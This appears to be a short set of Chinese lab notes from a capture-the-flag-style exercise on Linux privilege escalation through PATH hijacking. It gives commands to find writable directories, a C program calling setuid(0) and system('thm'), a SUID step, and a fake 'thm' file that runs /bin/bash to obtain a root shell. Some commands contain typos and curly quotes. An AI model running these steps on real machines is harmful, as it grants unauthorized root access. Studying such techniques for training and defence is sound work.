echo $PATH看一眼环境变量
1.输入下面命令查看具有写权限的文件夹
find / -writable 2>/dev/null | cut -d “/” -f 2 | sort -u

而使用下面的命令则展示“消除了与进程运行相关”的结果
find / -writable 2>/dev/null | cut -d “/” -f 2,3 | grep -v proc | sort -u
通过下面命令把文件夹路径添加到环境变量中
export PATH=/tmp:$PATH
在攻击机编译一个c文件:
创建一个文件,写入下面代码:
#include<unistd.h>
void main()
{ setuid(0);
setgid(0);
system("thm");
}
gcc path-poc.c -o path -w //编译生成path
在被攻击机上,chmod u+s path提高权限,设置suid,让该文件以root权限运行
将下列文件保存为.py文件
usr/bin/python3
import os
import sys
try:
os.system(“thm”)
except:
sys.exit()
生成一个thm文件,内容为:
“/bin/bash” 将它chmod 777
生成thm文件,提升权限,运行./test:

关键是这个 test 文件。他是elf文件,里面的代码利用了PATH漏洞